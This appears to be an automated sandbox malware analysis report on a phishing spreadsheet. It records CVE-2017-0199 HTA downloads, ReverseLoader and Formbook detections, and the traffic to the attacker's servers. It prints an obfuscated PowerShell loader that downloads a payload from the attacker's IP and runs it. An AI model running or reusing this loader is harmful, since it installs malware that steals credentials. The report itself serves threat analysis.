Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49162
Source: global traffic TCP traffic: 192.168.2.22:49162 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 188.114.97.6:443 -> 192.168.2.22:49163
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 146.70.113.200:80
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 146.70.113.200:80
Source: global traffic TCP traffic: 146.70.113.200:80 -> 192.168.2.22:49165

Networking

Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49164
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 146.70.113.200:80 -> 192.168.2.22:49162
Source: Network traffic Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 146.70.113.200:80
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49172
Source: Network traffic Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49167
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: Joe Sandbox View ASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 146.70.113.200:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 146.70.113.200:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 146.70.113.200:80
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
Source: global traffic HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 146.70.113.200
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_000007FE899D7018 URLDownloadToFileW, 8_2_000007FE899D7018
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F2129E.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 146.70.113.200If-Range: "26ee1-62840224d2d3d"
Source: global traffic HTTP traffic detected: GET /231/seethebestmagicalthignsgivegoodforu.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/dnv/seemebestthingsgivenmegood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 02 Dec 2024 02:16:18 GMTConnection: Keep-AliveHost: 146.70.113.200If-None-Match: "26ee1-62840224d2d3d"
Source: global traffic HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231/ZAHHRZA.txt HTTP/1.1Host: 146.70.113.200Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: linkjago.me
Source: global traffic DNS traffic detected: DNS query: 1016.filemail.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 27.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 27.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509298031.0000000000180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001B.00000002.509601721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: PO#BBGR2411PO69.xls OLE: Microsoft Excel 2007+
Source: 09230000.0.dr OLE: Microsoft Excel 2007+
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestthingsgivenmegood[1].hta
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_0042C4A3 NtClose, 27_2_0042C4A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk, 27_2_00A707AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6F9F0 NtClose,LdrInitializeThunk, 27_2_00A6F9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FAE8 NtQueryInformationProcess,LdrInitializeThunk, 27_2_00A6FAE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FB68 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_00A6FB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FDC0 NtQuerySystemInformation,LdrInitializeThunk, 27_2_00A6FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A700C4 NtCreateFile, 27_2_00A700C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A70060 NtQuerySection, 27_2_00A70060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A70078 NtResumeThread, 27_2_00A70078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A70048 NtProtectVirtualMemory, 27_2_00A70048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A701D4 NtSetValueKey, 27_2_00A701D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A7010C NtOpenDirectoryObject, 27_2_00A7010C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A70C40 NtGetContextThread, 27_2_00A70C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A710D0 NtOpenProcessToken, 27_2_00A710D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A71148 NtOpenThread, 27_2_00A71148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6F8CC NtWaitForSingleObject, 27_2_00A6F8CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A71930 NtSetContextThread, 27_2_00A71930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6F938 NtWriteFile, 27_2_00A6F938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6F900 NtReadFile, 27_2_00A6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FAB8 NtQueryValueKey, 27_2_00A6FAB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FAD0 NtAllocateVirtualMemory, 27_2_00A6FAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FA20 NtQueryInformationFile, 27_2_00A6FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FA50 NtEnumerateValueKey, 27_2_00A6FA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FBB8 NtQueryInformationToken, 27_2_00A6FBB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FBE8 NtQueryVirtualMemory, 27_2_00A6FBE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FB50 NtCreateKey, 27_2_00A6FB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FC90 NtUnmapViewOfSection, 27_2_00A6FC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FC30 NtOpenProcess, 27_2_00A6FC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FC60 NtMapViewOfSection, 27_2_00A6FC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FC48 NtSetInformationFile, 27_2_00A6FC48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A71D80 NtSuspendThread, 27_2_00A71D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A6FD8C NtDelayExecution, 27_2_00A6FD8C
